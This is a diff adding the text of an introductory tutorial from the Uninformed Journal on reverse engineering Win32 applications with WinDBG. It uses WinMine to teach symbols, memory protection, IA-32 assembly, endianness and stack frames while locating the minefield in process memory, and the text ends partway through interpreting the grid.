diff --git a/uninformed/1.1.txt b/uninformed/1.1.txt new file mode 100644 index 0000000..84b8327 --- /dev/null +++ b/uninformed/1.1.txt @@ -0,0 +1,1214 @@ +Introduction to Reverse Engineering Win32 Applications +trew +trew@exploit.us + + +1) Foreword + +Abstract: During the course of this paper the reader will be +(re)introduced to many concepts and tools essential to understanding and +controlling native Win32 applications through the eyes of Windows Debugger +(WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and +demonstrate the functionality provided by WinDBG and how this functionality +can be harnessed to aid the reader in reverse engineering native Win32 +applications. Topics covered include an introductory look at IA-32 assembly, +register significance, memory protection, stack usage, various WinDBG commands, +call stacks, endianness, and portions of the Windows API. Knowledge gleaned +will be used to develop an application designed to reveal and/or remove bombs +from the WinMine playing grid. + +Thanks: The author would like to thank thief, skape, +arachne, H D Moore, h1kari, Peter, warlord, west, and everyone else that +participated in the initial release of the Uninformed Journal. + + +2) Introduction + +Games can often times be very frustrating. This frustration stems +from the inherent fact that games, by design, present many unknowns +to the player. For example, how many monsters are lurking behind +door number three, and are these eight clips of 90 50 caliber +rounds going to be enough to kill this guy? Ten lives and a broken +keyboard later, acquiring the ability to not only level the playing +field, but get even, grows extremely attractive, at any cost. Some +people risk reputational and karma damage to acquire that edge -- by +cheating. + +Many develop cheats for this very reason, to obtain an unfair advantage. +Others, however, have an entirely different motivation -- the challenge it +involves. Motivations aside, the purpose of this document is to familiarize the +reader with basic methodologies and tools available that aid in the practice of +reverse engineering native Windows applications. Throughout, the reader will be +introduced to WinDBG, IA-32 assembler, and portions of the Windows API. These +concepts will be demonstrated by example, via a step by step navigation through +the portions of WinMine that are pivotal in obtaining the coveted unfair +advantage. + +3) Getting Started + +Although this document is designed to speak at an introductory level, it is +expected that the reader satisfies the following prerequisites: + + 1. Understanding of hexadecimal number system + 2. The ability to develop basic C applications + 3. The ability to install and properly configure WinDBG + 4. Access to a computer running Windows XP with WinMine installed + + +The following are suggested materials to have available while reading this document: + + + 1. IA-32 Instruction Set Reference A-M [7] + 2. IA-32 Instruction Set Reference N-Z [7] + 3. IA-32 Volume 1 - Basic Architecture [7] + 4. Microsoft Platform SDK [4] + 5. Debugger Quick Reference [8] + +First, WinDBG and the Symbol Packages http://msdl.microsoft.com/download/symbols/packages/windowsxp/WindowsXP-KB835935-SP2-slp-Symbols.exe +need to be properly installed and configured. WinDBG is part of The Debugging +Tools Windows http://msdl.microsoft.com/download/symbols/debuggers/dbg_x86_6.4.7.2.exe package. 
+ +While these download, the time will be passed by identifing potential goals, +articulating what a debugger is, what abilities they provide, what symbols are, +and how they are useful when debugging applications. + + +3.1) Identifying Goals + +The basic strategy behind WinMine is to identify the location of bombs within a +given grid and clear all unmined blocks in the shortest duration of time. The +player may track identified bomb locations by placing flags or question marks +upon suspect blocks. With this in mind, one can derive the following possible +goals: + + 1. Control or modify time information + 2. Verify the accuracy of flag and question mark placement + 3. Identify the location of bombs + 4. Remove bombs from the playing grid + +In order to achieve these goals, the reader must first determine the following: + + 1. The location of the playing grid within the WinMine process + 2. How to interpret the playing grid + 3. The location of the clock within the WinMine process + +For the scope of this paper, the focus will be on locating, interpreting, and +revealing and/or removing bombs from the playing grid. + + +3.2) Symbols and Debuggers + +A debugger is a tool or set of tools that attach to a process in order to +control, modify, or examine portions of that process. More specifically, +a debugger provides the reader with the ability to modify execution flow, +read or write process memory, and alter register values. For these reasons, +a debugger is essential for understanding how an application works so that it +can be manipulated in the reader's favor. + +Typically, when an application is compiled for release, it does not contain +debugging information, which may include source information and the names of +functions and variables. In the absence of this information, understanding the +application while reverse engineering becomes more difficult. This is where +symbols come in, as they provide the debugger, amongst other things, the +previously unavailable names of functions and variables. For more information +on symbols, the reader is encouraged to read the related documents in the +reference section.[3] + + +3.3) Symbol Server + +Hopefully by now both the Debugging Tools for Windows and the Symbols Packages +have finished downloading. Install them in either order but take note of the +directory the symbols are installed to. Once both are installed, begin by +executing WinDBG, which can be found under Debugging Tools for Windows, beneath +Programs, within the Start Menu. Once WinDBG is running click on File, +Symbol File Path, and type in the following: + + SRV**http://msdl.microsoft.com/download/symbols + +For example, if symbols were installed to: + + C:\Windows\Symbols + +then the reader should enter: + + SRV*C:\WINDOWS\Symbols*http://msdl.microsoft.com/download/symbols + +This configuration tells WinDBG where to find the previously installed symbols, +and if needed symbols are unavailable, where to get them from -- the Symbol +Server. For more information on Symbol Server, the reader is encouraged to +read the information in the reference section.[2] + + +4) Getting Familiar with WinDBG + +Whether the reader points and clicks their way through applications or uses +shortcut keys, the WinDBG toolbar will briefly act as a guide for discussing +some basic debugging terminology that will be used throughout this document. +From left to right, the following options are available: + + 1. Open Source Code Open associated source code for the debugging session. + 2. 
Cut Move highlighted text to the clipboard + 3. Copy Copy highlighted text to the clipboard + 4. Go Execute the debugee + 5. Restart Restart the debugee process. This will cause the debugee to + terminate. + 6. Stop Debugging Terminate the debugging session. This will cause the + debugee to terminate. + 7. Break Pause the currently running debugee process + +The next four options are used after the debugger has been told to break. The +debugger can be issued a break via the previous option, or the user may specify +breakpoints. Breakpoints can be assigned to a variety of conditions. +Most common are when the processor executes instructions at a specific +address, or when certain areas of memory have been accessed. Implementing +breakpoints will be discussed in more detail later in this document. + +Once a breakpoint has been reached, the process of executing individual +instructions or function calls is referred to as stepping through the +process. WinDBG has a handful of methods for stepping, four of which will be +immediately discussed. + + 1. Step Into Execute a single instruction. When a + function is called, this will cause the debugger to step into + that function and break, instead of executing the function in its + entirety. + + 2. Step Over Execute one or many instructions. When a + function is called, this will cause the debugger to execute the + called function and break after it has returned. + + 3. Step Out Execute one or many instructions. Causes + the debugger to execute instructions until it has returned from the + current function. + + 4. Run to Cursor Execute one or many instructions. + Causes the debugger to execute instructions until it has reached + the addresses highlighted by the cursor. + +Next, is Modify Breakpoints which allows the reader to add or modify +breakpoints. The remainder of the toolbar options is used to make visible and +customize various windows within WinDBG. + + +4.1) WinDBG Windows + +WinDBG provides a variety of windows, which are listed beneath the View +toolbar option, that provide the reader with a variety of information. Of +these windows, we will be utilizing Registers, Disassembly, and Command. +The information contained within these three windows is fairly self describing. + +The Registers window contains a list of all processor registers and +their associated values. Note, as register values change during execution the +color of this value will turn red as a notification to the reader. For the +purpose of this document, we will briefly elaborate on only the following +registers: eip, ebp, esp, eax, ebx, ecx, edx, esi, and edi. + + eip: Contains the address of the next instruction to be executed + ebp: Contains the address of the current stack frame + esp: Contains the address of the top of the stack. This will be + discussed in greater detail further in the document. + +The remaining listed registers are for general use. How each of these +registers are utilized is dependant on the specific instruction. For specific +register usage on a per instruction basis, the reader is encouraged to +reference the IA-32 Command References [7]. + +The Disassembly window will contain the assembly instructions residing +at a given address, defaulting at the value stored within the eip +register. + +The Command window will contain the results of requests made of the +debugger. Note, at the bottom of the Command window is a text box. +This is where the user issues commands to the debugger. Additionally, to the +left of this box is another box. 
When this box is blank the debugger is either +detached from a process, processing a request, or the debugee is running. When +debugging a single local process in user-mode, this box will contain a prompt +that resembles "0:001>". For more information on interpreting this +prompt, the reader is encouraged to read the related documentation in the +reference section [9]. + +There exists three classes of commands that we can issue in the Command window; +regular, meta, and extension. Regular commands are those commands +designed to allow the reader to interface with the debugee. Meta commands +are those commands prefaced with a period (.) and are designed to configure or +query the debugger itself. Extension commands are those commands prefaced +with an exclamation point (!) and are designed to invoke WinDBG plug-ins. + + +5) Locating the WinMine Playing Grid + +Let's begin by firing up WinMine, via Start Menu -> Run -> WinMine. +Ensure WinMine has the following preferences set: + +Level: Custom + Height: 900 + Width: 800 + Mines: 300 +Marks: Enabled +Color: Enabled +Sound: Disabled + +Once this is complete, compile and execute the supplemental SetGrid +application[12] found in the reference section. This will ensure that the +reader's playing grid mirrors the grid utilized during the writing of this +paper. Switch over to WinDBG and press F6. This will provide the reader with a +list of processes. Select winmine.exe and press Enter. This will attach WinDBG +to the WinMine process. The reader will immediately notice the Command, +Registers, and Disassembly windows now contain values. + + +5.1) Loaded Modules + +If the reader directs attention to the Command window it is noticed that +a series of modules are loaded and the WinMine process has been issued a break. + +ModLoad: 01000000 01020000 C:\WINDOWS\System32\winmine.exe +ModLoad: 77f50000 77ff7000 C:\WINDOWS\System32\ntdll.dll +ModLoad: 77e60000 77f46000 C:\WINDOWS\system32\kernel32.dll +ModLoad: 77c10000 77c63000 C:\WINDOWS\system32\msvcrt.dll +... +ModLoad: 77c00000 77c07000 C:\WINDOWS\system32\VERSION.dll +ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.DLL +ModLoad: 771b0000 772d4000 C:\WINDOWS\system32\OLE32.DLL +(9b0.a2c): Break instruction exception - code 80000003 (first chance) +eax=7ffdf000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 +eip=77f75a58 esp=00cfffcc ebp=00cffff4 iopl=0 nv up ei pl zr na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 +ntdll!DbgBreakPoint: +77f75a58 cc int 3 + +The two 32-bit addresses following "ModLoad:" represent the virtual memory +address range the corresponding module is mapped to. These loaded modules +contain functionality that WinMine is dependant upon. To get a list of loaded +modules, the reader may issue either of the following commands: lm, !lm, !dlls + +The reader should also notice that WinDBG, by default, articulates register +values within the Command window upon reaching a breakpoint or at +the completion of each step. + +5.2) Loaded Symbols + + +Time was spent to download and install the Symbols Packages, so let's +see what hints they provide. Issue the following within the Command +window get a list of all available symbols for WinMine. + +x WinMine!* + +The e(x)amine command interprets everything to the left of the exclamation +point as a regular expression mask for the module name, and everything to the +right as a regular expression mask for the symbol name. 
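+For example, a narrower mask (a hypothetical query; any pattern will do)
+such as the following would list only those WinMine symbols whose names
+contain the string "Grid":
+
+x winmine!*Grid*
+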
For more information
+on regular expression syntax, the reader is encouraged to read the related
+documents in the reference section [10].
+
+A list of symbols will scroll within the Command window.
+
+...
+01003df6 winmine!GetDlgInt = <no type information>
+010026a7 winmine!DrawGrid = <no type information>
+0100263c winmine!CleanUp = <no type information>
+01005b30 winmine!hInst = <no type information>
+01003940 winmine!Rnd = <no type information>
+01001b81 winmine!DoEnterName = <no type information>
+...
+
+From this listing, it is not possible to positively ascertain which symbols
+represent functions and which represent variables. This is due, as WinDBG has
+pointed out, to the absence of type information, which is typical of public
+symbol files. Thankfully, methodologies exist that allow the reader to, at a
+minimum, distinguish functions from non-functions. Assuming the reader is not
+well versed in reading assembly, methods requiring that skill set will be
+avoided for the time being. Instead, an alternative technique, examining
+virtual memory protections, will be investigated, as it is relatively easy to
+comprehend and apply.
+
+
+5.3) Memory Protection
+
+Thus far, discussions related to application memory have been sufficiently
+neglected, until now. This is not to say the inner workings of Windows memory
+management are about to be revealed; rather, a fairly pigeonholed approach
+will be taken for the sake of brevity and to satisfy our immediate
+utilitarian needs.
+
+When an application requests memory, a region is allocated provided the
+requested amount is available. If the allocation is successful, this region
+of memory can, amongst other things, be protected. More specifically, the
+region has pseudo access control lists applied to it that deny or permit
+certain access types. A couple of examples of these access types are the
+ability to read information from, write information to, and execute
+instructions at, the given region. It is these access types that provide the
+ability to quickly determine, with relatively high probability, whether a
+symbol is a function or a non-function. By virtue of being a function, these
+memory regions allow execution. Conversely, memory regions allocated for
+classic variables do not allow instruction execution. (Note that all memory
+pages on the IA-32 architecture are executable at the hardware level despite
+these memory protections; the protection attributes nonetheless serve as a
+useful heuristic.) Conveniently, WinDBG ships with an extension command that
+allows the user to retrieve the memory protection attributes for a given
+address: !vprot. Let's select an aptly named symbol to demonstrate this
+functionality. Type the following in the Command window:
+
+!vprot WinMine!ShowBombs
+
+ShowBombs was chosen as the name implies (to me) that it's a function.
+Let's see what !vprot says:
+
+BaseAddress: 01002000
+AllocationBase: 01000000
+AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY
+RegionSize: 00003000
+State: 00001000 MEM_COMMIT
+Protect: 00000020 PAGE_EXECUTE_READ
+Type: 01000000 MEM_IMAGE
+
+At first glance this might appear contradictory. However, the
+AllocationProtect field denotes the default protection for the entire memory
+region, while the Protect field speaks to the current protection on the
+specific page containing the address given as the first argument. This, as
+one would expect, is set to execute and read, as denoted by
+PAGE_EXECUTE_READ. Next, look at the memory protection for a region
+allocated for a suspected variable, such as WinMine!szClass.
+
+!vprot WinMine!szClass
+
+The expectation is that !vprot will return page protection that only allows
+read and write access to this region.
+ +BaseAddress: 01005000 +AllocationBase: 01000000 +AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY +RegionSize: 00001000 +State: 00001000 MEM_COMMIT +Protect: 00000004 PAGE_READWRITE +Type: 01000000 MEM_IMAGE + +So be it. Considering the naming convention (sz preface), which implies a +string type, one could easily validate the assumption by examining the data +at this memory location. To do this, the display memory command can be +utilized. Type the following in the Command window: + +du WinMine!szClass + +The 'u' modifier tells the (d)isplay memory command to interpret the string as +Unicode. The results of this are: + +01005aa0 "Minesweeper" + +I'm convinced. + + +5.4) Understanding Assemblies + +The goal for this chapter is to simply locate where the playing grid resides. +With that in mind, revisit the previously identified ShowBombs function. +Logically, it wouldn't be that long of a jump to assume this function will lead +to the playing grid. Set a breakpoint on this function by issuing the +following command: + +bp WinMine!ShowBombs + +WinDBG provides no positive feedback that the breakpoint was successfully set. +However, WinDBG will alert the user if it is unable to resolve the name or +address being requested. To obtain a list of set breakpoints, issue the +following command: + +bl + +The Command window should reflect: + +0 e 01002f80 0001 (0001) 0:*** WinMine!ShowBombs + +The leading digit represents the breakpoint number, which can be used as a +reference for other breakpoint aware commands. The next field depicts the +status of the breakpoint, as either (e)nabled or (d)isabled. This is followed +by the virtual address of the breakpoint. The next four digits speak to the +number of passes remaining until this breakpoint will activate. Adjacent, +in parentheses, is the initial pass count. Next, is the process number, not to +be confused with process ID, a colon acting as a separator between what would +be a thread ID, if this was a thread specific breakpoint. It's not, hence +three asterisks. Lastly, at least in the above example, is the module name +and symbol/function where WinDBG will break at. + +Set WinMine in motion by hitting F5 (Go) or type 'g' in the Command +window. The reader should notice that WinDBG informs the user the +"Debugee is running". Switch to the WinMine window and click on the +upper left box, which should reveal the number two. Next, click the box to the +right and it will be very apparent that a bomb has been selected, as the reader +will no longer be able to interact with WinMine. This is due to the fact that +WinDBG recognized that a breakpoint condition has been met and is waiting for +instruction. When back in the WinDBG, the Command window has +highlighted the following instruction: + +01002f80 a138530001 mov eax,[WinMine!yBoxMac (01005338)] + +This is the first instruction within the ShowBombs function, which +corresponds to the address previously identified when current breakpoints were +listed. Before attempting to understand this instruction, let's first cover a +few functional and syntactical aspects of IA-32 assembly. It is recommended +that the reader make available the aforementioned supplemental material +mentioned in Chapter 2. + +Each line in the disassembly describes an instruction. Use the above +instruction to identify the major components of an instruction without getting +distracted by how this instruction relates to the ShowBombs function. +If distilled, the previous instruction can be abstracted and represented as: + +
<address> <opcodes> <operation> <operand1>, <operand2>
+
The <address> represents the virtual location of the <opcodes>. Opcodes are
+literal instructions that the processor interprets to perform work.
+Everything to the right of <opcodes> represents a translation of these
+opcodes into assembly language. The <operation> can be thought of as a verb
+or function that treats each operand as an argument. It's of importance to
+note that in Intel style assembly (as opposed to AT&T style, which is
+utilized by GCC), these operations move from right to left. That is, when
+performing arithmetic or moving data around, the result typically finds its
+destination at <operand1>.
+
+Looking back at the original instruction, one can determine that the 32-bit
+value, or word, located at 0x01005338 is being copied into the eax register.
+Brackets ([]) are used to dereference the address contained in an operand,
+much like an asterisk (*) does in C. Let's focus on the opcodes for a moment.
+If the reader looks up the opcode for a mov instruction that targets the eax
+register, the value 0xa1 will be found.
+
+Opcode Instruction       Description
+...
+A0     MOV AL,moffs8*    Move byte at (seg:offset) to AL.
+A1     MOV AX,moffs16*   Move word at (seg:offset) to AX.
+A1     MOV EAX,moffs32*  Move doubleword at (seg:offset) to EAX.
+...
+
+It is not by coincidence that the first byte of <opcodes> is also 0xa1. This
+leaves <operand2> for the remainder, which brings us to a short discussion on
+endianness.
+
+
+5.5) Endianness
+
+Endianness refers to the order in which multi-byte data is stored. There
+exist two commonly referenced conventions: little and big. Little endian
+systems, which include the IA-32 architecture, store data starting with the
+least significant byte, through the most significant byte. Big endian systems
+do the opposite, storing the most significant byte first. For example, the
+value 0x11223344 would be stored as 0x44332211 on a little endian system,
+and as 0x11223344 on a big endian system.
+
+Notice the value in <operand2> is 0x01005338 and the remainder of <opcodes>
+is 0x38530001. If <operand2> is rewritten and expressed in little endian
+order, one can see these values are equal.
+
+0x01005338, rewritten for clarity: 0x01 0x00 0x53 0x38
+                                     |    |    |    |
+                                     |    |    +----|-+
+                                     |    +--------|-|-+
+                                     +--------------|-|-|-+
+                                                    V V V V
+                                                   0x38530001
+
+With this information, one can see exactly how the processor is instructed to
+move the value stored at 0x01005338 into the eax register. For more
+information on endianness, the reader is encouraged to read the related
+documents in the reference section [5].
+
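+To observe the same byte ordering outside of the debugger, the following
+minimal C sketch (a supplemental example, separate from the WinMine
+walkthrough) prints the individual bytes of the value 0x01005338 as they are
+laid out in memory:
+
+#include <stdio.h>
+
+int main(void)
+{
+    /* The address encoded in the mov instruction examined above. */
+    unsigned int value = 0x01005338;
+    unsigned char *bytes = (unsigned char *)&value;
+
+    /* On a little endian IA-32 system this prints: 38 53 00 01 */
+    printf("%02x %02x %02x %02x\n", bytes[0], bytes[1], bytes[2], bytes[3]);
+
+    return 0;
+}
+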
+5.6) Conditions
+
+Let's see if this new information can be applied to aid in reaching the goal
+of locating the playing grid. Start by hitting F10, or by typing 'p' in the
+Command window, to execute the current instruction and break. There are a
+couple of things to notice. First, the previously magenta colored bar that
+highlighted the examined instruction from above is now red, and the
+instruction just below it is now highlighted blue. WinDBG, by default,
+denotes instructions that satisfy a breakpoint condition with a red highlight
+and the current instruction with a blue highlight. Additionally, a handful of
+values in the Registers window have been highlighted in red. Remember from
+Chapter 4 that this signifies an updated register value. As one would expect,
+the eax register has been updated, but what does its new value represent?
+0x18, which now resides in eax, can be expressed as 24 in decimal. Note that
+our playing grid, even though previously specified at 800x900, was rendered
+at 30x24. Coincidence? This can be validated by restarting WinMine with
+varying grid sizes, but for the sake of brevity let the following statement
+evaluate as true:
+
+winmine!yBoxMac == Height of Playing Grid
+
+The following instructions:
+
+01002f85 83f801 cmp eax,0x1
+01002f88 7c4e jl winmine!ShowBombs+0x58 (01002fd8)
+
+compare this value, the maximum height, to the literal value 0x1. If the
+reader visits the description of the cmp instruction in the reference
+material, it can be determined that this instruction sets bits within
+EFLAGS[6] based on the result of the comparison. Logically, the next
+instruction is a conditional jump. More specifically, this instruction will
+jump to the address 0x01002fd8 if eax is "Less, Neither greater nor equal"
+to 0x1; in other words, if eax is less than 0x1. One can come to this
+conclusion by first recognizing that any mnemonic that starts with the letter
+'j' and is not jmp is a conditional jump. The condition by which to perform
+the jump is represented by the following letter or letters. In this case it
+is an 'l', which signifies "Jump short if less" per the definition of this
+instruction found in the instruction reference and the previously mentioned
+EFLAGS definition. This series of instructions can be expressed in more
+familiar terms as:
+
+if(iGridHeight < 1) {
+  //jmp winmine!ShowBombs+0x58
+}
+
+Translating assembly into pseudo code or C may be helpful when attempting to
+understand large or complex functions. One can make the prediction that the
+conditional jump will not be taken, as eax is currently valued at 0x18. But,
+for the mere academics of it, one can determine what would happen by typing
+the following in the Command window:
+
+u 0x1002fd8
+
+This will show the reader the instructions that would be executed should the
+condition be met.
+
+
+5.7) Stacks and Frames
+
+The 'u' command instructs WinDBG to (u)nassemble, or translate from opcodes
+to mnemonics with operands, the information found at the specified address.
+
+01002fd8 e851f7ffff call WinMine!DisplayGrid (0100272e)
+01002fdd c20400 ret 0x4
+
+From this, one can see that the DisplayGrid function is called and the
+ShowBombs function subsequently returns to the caller. But what is call
+actually doing? Can one tell where ret is really returning to, and what does
+the 0x4 represent? The IA-32 Command Reference states that call "Saves
+procedure linking information on the stack and branches to the procedure
+(called procedure) specified with the destination (target) operand. The
+target operand specifies the address of the first instruction in the called
+procedure." The reader may notice that the command reference has variable
+behaviors for the call instruction depending on the type of call being made.
+To further identify what call is doing, the reader can examine the opcodes,
+as previously discussed, and find 0xe8. 0xe8 represents a near call. "When
+executing a near call, the processor pushes the value of the EIP register
+(which contains the offset of the instruction following the CALL instruction)
+onto the stack (for use later as a return-instruction pointer)." This is the
+first step in building a frame. Each time a function call is made, another
+frame is created so that the called function can access arguments, create
+local variables, and have a mechanism to return to the calling function. The
+composition of the frame is dependent on the function's calling convention.
+For more information on calling conventions, the reader is encouraged to read
+the relevant documents in the reference section [1].
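+As a brief, hypothetical illustration (not taken from WinMine) of how the
+calling convention determines the form of the ret instruction, consider the
+following two functions compiled as 32-bit code. Under the stdcall
+convention, used by most of the Windows API, the callee removes its own
+arguments, so a single four byte argument yields "ret 4"; under the cdecl
+convention the caller performs the cleanup and the function returns with a
+plain "ret":
+
+int __stdcall StdcallSum(int a)  /* callee cleans the stack: ends in "ret 4" */
+{
+    return a + 1;
+}
+
+int __cdecl CdeclSum(int a)      /* caller cleans the stack: ends in "ret" */
+{
+    return a + 1;
+}
+
+int main(void)
+{
+    return StdcallSum(1) + CdeclSum(1);
+}
+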
To view the current call stack, or series of +linked frames, use the 'k' command. + +ChildEBP RetAddr +0006fd34 010034b0 winmine!ShowBombs +0006fd40 010035b0 winmine!GameOver+0x34 +0006fd58 010038b6 winmine!StepSquare+0x9e +0006fd84 77d43b1f winmine!DoButton1Up+0xd5 +0006fdb8 77d43a50 USER32!UserCallWinProcCheckWow+0x150 +0006fde4 77d43b1f USER32!InternalCallWinProc+0x1b +0006fe4c 77d43d79 USER32!UserCallWinProcCheckWow+0x150 +0006feac 77d43ddf USER32!DispatchMessageWorker+0x306 +0006feb8 010023a4 USER32!DispatchMessageW+0xb +0006ff1c 01003f95 winmine!WinMain+0x1b4 +0006ffc0 77e814c7 winmine!WinMainCRTStartup+0x174 +0006fff0 00000000 kernel32!BaseProcessStart+0x23 + +With this, the reader can track the application flow in reverse order. The +reader may find it easier to navigate the call stack by pressing Alt-6, which +will bring up the Call Stack window. Here, the call stack information +is digested a bit more and displayed in a tabular manner. With the call stack +information, one can answer the second question regarding where ret is +really headed. For example, once ShowBombs returns, eip will +be set to 0x010034b0. Finally, the significance of 0x4 can be learned by +reading the ret instruction definition, which states that this value +represents "...the number of stack bytes to be released after the return +address is popped; the default is none. This operand can be used to release +parameters from the stack that were passed to the called procedure and are no +longer needed." More specifically, when the processor encounters a ret +instruction it pops the address stored at the top of the stack, where esp +is pointing, and places that value in the eip register. If the ret +instruction has an operand, that operand represents how many additional bytes +should be removed from the top of the stack. With this information, and +knowing that 32-bit addresses are four bytes long, one can determine that the +ShowBombs function accepts one argument. This is dependant upon calling +convetion, which will be discussed later in this document. + +Returning to the task at hand, the following represents the current picture of +what the ShowBombs function is doing: + +if(iGridHeight < 1) { + DisplayGrid(); + return; +} else { + //do stuff +} + +Continuing on, one can see the following in the Disassembly window, which +will take the place of "//do stuff". + +01002f8a 53 push ebx +01002f8b 56 push esi +01002f8c 8b3534530001 mov esi,[winmine!xBoxMac (01005334)] +01002f92 57 push edi +01002f93 bf60530001 mov edi,0x1005360 + +Begin by stepping WinDBG twice (by pressing 'p' twice) so that eip is set +to 0x1002f8a. The next two instructions are storing the ebx and esi +registers on the stack. This can be demonstrated by first viewing the memory +referenced by esp, identifying the value stored in ebx, pressing 'p' +to execute push ebx, and revisiting the value stored at esp. The +reader will find the value of ebx stored at esp. + +0:000> dd esp +0006fd38 010034b0 0000000a 00000002 010035b0 +0006fd48 00000000 00000000 00000200 0006fdb8 +... 
+0:000> r ebx
+ebx=00000001
+0:000> p
+eax=00000018 ebx=00000001 ecx=0006fd14 edx=7ffe0304 esi=00000000 edi=00000000
+eip=01002f8b esp=0006fd34 ebp=0006fdb8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
+winmine!ShowBombs+0xb:
+01002f8b 56 push esi
+0:000> dd esp
+0006fd34 00000001 010034b0 0000000a 00000002
+0006fd44 010035b0 00000000 00000000 00000200
+
+Notice that esp has been decremented by four (the size of a 32-bit pointer)
+and that the value of ebx is now at that location. The behavior can be
+observed again by stepping to execute push esi. Again, the reader will notice
+the value of esp decrement by four and the value within esi appear at this
+new location. This is the basic principle of how the stack works. The stack
+pointer is decremented and the value being pushed onto the stack is placed at
+the new address esp is pointing at. It is also important to note that the
+stack grows down. That is, as values are placed on the stack, the stack
+pointer decreases to make room. This begs the question: what are the upper
+and lower limits of the stack? It can't keep growing forever, can it? The
+short answer is no, the stack has a floor and a ceiling, which can be
+identified by examining the Thread Environment Block, or TEB. Luckily, WinDBG
+comes with an extension command to accomplish this: !teb.
+
+0:000> !teb
+TEB at 7ffde000
+    ExceptionList: 0006fe3c
+    StackBase: 00070000
+    StackLimit: 0006c000
+    SubSystemTib: 00000000
+    FiberData: 00001e00
+    ArbitraryUserPointer: 00000000
+    Self: 7ffde000
+    EnvironmentPointer: 00000000
+    ClientId: 00000ff4 . 00000ff8
+    RpcHandle: 00000000
+    Tls Storage: 00000000
+    PEB Address: 7ffdf000
+    LastErrorValue: 183
+    LastStatusValue: c0000008
+    Count Owned Locks: 0
+    HardErrorMode: 0
+
+Note the values for StackBase and StackLimit, which refer to the stack's
+ceiling and floor, respectively. For more information on the TEB, the reader
+is encouraged to read the related documents in the reference section [11].
+That was an exciting tangent. Circling back, the reader is found at the
+following instruction:
+
+01002f8c 8b3534530001 mov esi,[winmine!xBoxMac (01005334)]
+
+This, if convention holds true, will store the width of the playing grid in
+esi. By single stepping ('p'), the reader will notice the esi register is
+denoted in red within the Registers window and now contains the value 0x1e.
+0x1e is 30 in decimal, which, if the reader recalls, is the width of the
+current playing grid. Hence, one can make the educated determination that
+xBoxMac represents the width of the playing grid. The next instruction, push
+edi, is saving the value in the edi register on the stack in preparation for
+the subsequent instruction: mov edi,0x1005360. This is where things get a bit
+more interesting, as this instruction begs the question: what is the
+significance of 0x1005360? Considering that the previous instructions
+gathered prerequisite information about the playing grid, perhaps this
+address is indeed the playing grid itself! To determine this, the reader
+should examine some aspects of this memory address. The aforementioned !vprot
+extension command will provide information regarding the type of access
+permitted to this memory address, which is PAGE_READWRITE. This information
+isn't overly valuable, but it is favorable in the sense that this address
+does not reside within an executable portion of the application space and is
+therefore likely a variable allocation.
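+For readers who would like to confirm this outside of the debugger, the
+following sketch shows roughly how the same protection information could be
+queried programmatically with VirtualQueryEx. It assumes a process handle
+obtained with OpenProcess, a function introduced in section 7.1, and is
+offered only as a sketch:
+
+#include <windows.h>
+#include <stdio.h>
+
+/* Print the protection attributes of the page containing the suspected
+   grid address, much like the !vprot extension command does. */
+void QueryGridProtection(HANDLE hWinMineProc)
+{
+    MEMORY_BASIC_INFORMATION mbi = {0};
+
+    if (VirtualQueryEx(hWinMineProc, (LPCVOID)0x1005360, &mbi, sizeof(mbi))) {
+        printf("BaseAddress: %p\n", mbi.BaseAddress);
+        printf("Protect:     %08lx\n", mbi.Protect); /* 0x04 == PAGE_READWRITE */
+        printf("State:       %08lx\n", mbi.State);   /* 0x1000 == MEM_COMMIT */
+    }
+}
+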
+If this area is truly the playing grid one should be able to identify a pattern +while viewing the memory. To accomplish this, type 0x1005360 in to the Memory +window. The following should appear: + +01005360 10 42 cc 8f 8f 8f 8f 0f 8f 8f 8f 8f 0f 0f 8f 0f .B.............. +01005370 0f 8f 8f 8f 8f 8f 8f 0f 0f 0f 8f 0f 0f 8f 8f 10 ................ +01005380 10 8f 0f 0f 8f 8f 0f 0f 0f 0f 0f 8f 0f 0f 8f 8f ................ +01005390 0f 8f 0f 0f 0f 8f 8f 8f 0f 0f 8f 8f 8f 8f 8f 10 ................ +010053a0 10 0f 0f 8f 0f 0f 8f 0f 0f 0f 0f 0f 8f 0f 0f 0f ................ +010053b0 8f 0f 0f 0f 8f 8f 0f 0f 8f 0f 8f 0f 8f 8f 0f 10 ................ +010053c0 10 0f 0f 8f 0f 0f 8f 0f 0f 0f 8f 0f 0f 8f 0f 0f ................ +010053d0 8f 0f 0f 8f 0f 0f 0f 8f 0f 0f 0f 8f 0f 0f 0f 10 ................ +010053e0 10 0f 0f 8f 0f 8f 8f 0f 0f 8f 8f 0f 0f 8f 0f 0f ................ +010053f0 0f 0f 0f 0f 8f 0f 0f 0f 0f 0f 0f 0f 8f 0f 0f 10 ................ +01005400 10 8f 0f 0f 0f 0f 0f 0f 8f 8f 0f 8f 8f 0f 0f 8f ................ +01005410 0f 8f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 8f 8f 0f 10 ................ +01005420 10 8f 0f 8f 8f 0f 8f 8f 0f 0f 0f 8f 8f 0f 8f 0f ................ + +6) Interpreting the Playing Grid + +The reader may make the immediate observation that this portion of memory is +littered with a limited set of values. Most notably are 0x8f, 0x0f, 0x10, +0x42, 0xcc. Additionally, one may notice the following repeating pattern: + +0x10 <30 bytes> 0x10. + +The number 30 may ring familiar to the reader, as it was encountered earlier +when discovering the grid width. One may speculate that each pattern +repetition represents a row of the playing grid. To aid in confirming this, +switch to WinDBG and resume WinMine by pressing 'g' in the Command +window. Switch to WinMine and mentally overlay the information in the +Memory window with the playing grid. A correlation between these can +be identified such that each bomb on the playing grid corresponds to 0x8f and +each blank position on the playing grid corresponds to 0x0f. Furthermore, one +may notice the blown bomb on the playing grid is represented by 0xcc and the +number two is represented by 0x42. + +To confirm this is indeed the playing grid, it is essential to test the lower +bound by performing simple arithmetic and exercising the same technique +employed to identify the suspected beginning. The current hypothesis is +that each aforementioned pattern represents a row on the playing grid. If +this is true, one can multiply 32, the length of our pattern, by the number +of rows in the playing grid, 24. The product of this computation is 768, or +0x300 in hexadecimal. This value can be added to the suspected beginning of +the grid, which is located at 0x01005360, to derive an ending address of +0x01005660. Restart WinMine by clicking the yellow smiley face, rerun the +SetGrid helper application, and click the bottom right square on +the playing grid. 